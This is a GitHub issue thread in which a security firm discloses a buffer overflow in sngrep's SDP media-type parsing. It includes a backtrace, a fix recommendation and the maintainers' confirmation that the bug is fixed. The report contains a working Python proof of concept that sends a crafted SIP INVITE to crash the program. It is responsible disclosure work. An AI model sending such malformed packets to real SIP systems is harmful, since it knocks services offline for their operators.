search

irontec / sngrep

Ncurses SIP Messages flow viewer
GNU General Public License v3.0
1.02k stars 187 forks source link

sngrep crashes due to a buffer overflow caused by a malformed SDP media type #328

Closed sandrogauci closed 4 years ago

sandrogauci commented 4 years ago

For our introductory hello and a bit of background information, please see #327

Report follows:

sngrep crashes due to a buffer overflow caused by a malformed SDP media type

Description

When sending a specially crafted SIP message with a malformed SDP media type, sngrep crashes due to a buffer overflow. The following backtrace was generated during our tests:

#0  __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
#1  0x00007ffff7ced859 in __GI_abort () at abort.c:79
#2  0x00007ffff7d583ee in __libc_message (action=action@entry=do_abort, 
    fmt=fmt@entry=0x7ffff7e8207c "*** %s ***: terminated\n")
    at ../sysdeps/posix/libc_fatal.c:155
#3  0x00007ffff7dfa9ba in __GI___fortify_fail (
    msg=msg@entry=0x7ffff7e82012 "buffer overflow detected") at fortify_fail.c:26
#4  0x00007ffff7df9256 in __GI___chk_fail () at chk_fail.c:28
#5  0x00007ffff7df8b36 in __strcpy_chk (dest=0x7ffff00306f2 "", 
    src=0x7ffff79fcad1 'A' <repeats 200 times>..., destlen=destlen@entry=15)
    at strcpy_chk.c:30
#6  0x0000555555563f72 in strcpy (__src=<optimized out>, __dest=<optimized out>)
    at /usr/include/x86_64-linux-gnu/bits/string_fortified.h:90
#7  media_set_type (media=<optimized out>, type=<optimized out>) at media.c:65
#8  0x0000000000000000 in ?? ()

The issue was originally discovered during OpenSIPIt; tracked down and analyzed for severity and impact later.

Impact

Since most modern build systems will automatically include run-time best practice checks, it is highly unlikely that this issue is exploited in a way that it overwrites to adjacent memory locations. However, due to how fortify protection works, the program will still end up crashing. Nonetheless, this issue should not be dismissed by relying on build system protections and should be adequately fixed.

How to reproduce the issue

  1. Run sngrep
  2. Execute the following python program:
import socket

sdp="v=0\r\n" + \
    "o=- 1600157102 1600157102 IN IP4 127.0.0.1\r\n" + \
    "s=-\r\n" + \
    "c=IN IP4 127.0.0.1\r\n" + \
    "t=0 0\r\n" + \
    "m=%s 9999 RTP/AVP 8 0 96 101\r\n" % ('A' * 1024) + \
    "a=rtpmap:8 PCMA/8000/1\r\n" + \
    "a=rtpmap:0 PCMU/8000/1\r\n" + \
    "a=rtpmap:96 opus/96000/2\r\n" + \
    "a=rtpmap:101 telephone-event/8000/1\r\n" + \
    "a=sendrecv"

sip_msg="INVITE sip:bob_1@127.0.0.1:5060 SIP/2.0\r\n" + \
    "Via: SIP/2.0/UDP 127.0.0.1:40111;rport;branch=z9hG4bK-a\r\n" + \
    "Max-Forwards: 70\r\n" + \
    "From: <sip:bob_1@127.0.0.1:5060>;tag=3Ewqeuo81F1Hjvtg\r\n" + \
    "To: <sip:bob_1@127.0.0.1:5060>\r\n" + \
    "Call-ID: maooZ4nDzmArTBkT\r\n" + \
    "CSeq: 1020 INVITE\r\n" + \
    "Contact: <sip:bob_1@127.0.0.1:40111;transport=udp>\r\n" + \
    "Content-Length: %i\r\n" % len(sdp) + \
    "Content-Type: application/sdp\r\n" + \
    "\r\n" + \
    sdp

sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(sip_msg.encode(), ("127.0.0.1", 5060))
  1. Notice that sngrep has crashed

Solutions and recommendations

It is recommended that the length of the string passed to function media_set_type in media.c is checked against MEDIATYPELEN, which is of length 15.

About Enable Security

Enable Security develops offensive security tools and provides quality penetration testing to help protect your real-time communications systems against attack.

Disclaimer

The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.

Disclosure policy

This report is subject to Enable Security's vulnerability disclosure policy which can be found at https://github.com/EnableSecurity/Vulnerability-Disclosure-Policy.

Kaian commented 4 years ago

Hi @sandrogauci

Looks like this was fixed while performing the changes for #327 in these lines:

https://github.com/irontec/sngrep/blob/ed41e9e1cc11e03df850be93e288e48079b1fa4f/src/media.c#L62-L66

Thanks again for a so detailed issue!!

sandrogauci commented 4 years ago

will test and confirm the fix

sandrogauci commented 4 years ago

HI @Kaian thanks for the fixes and the warm response! We tested the fix and it does address the issue. We ran a bit of blackbox fuzzing again and didn't find new obvious issues.

sandrogauci commented 4 years ago

@Kaian are you planning on doing a release sometime soon by any chance? We'll mention these fixes in our blog (rtcsec.com) so if you're doing a release we could link to that as a fixed version.

Kaian commented 4 years ago

I will try to release 1.4.8 during the first week of November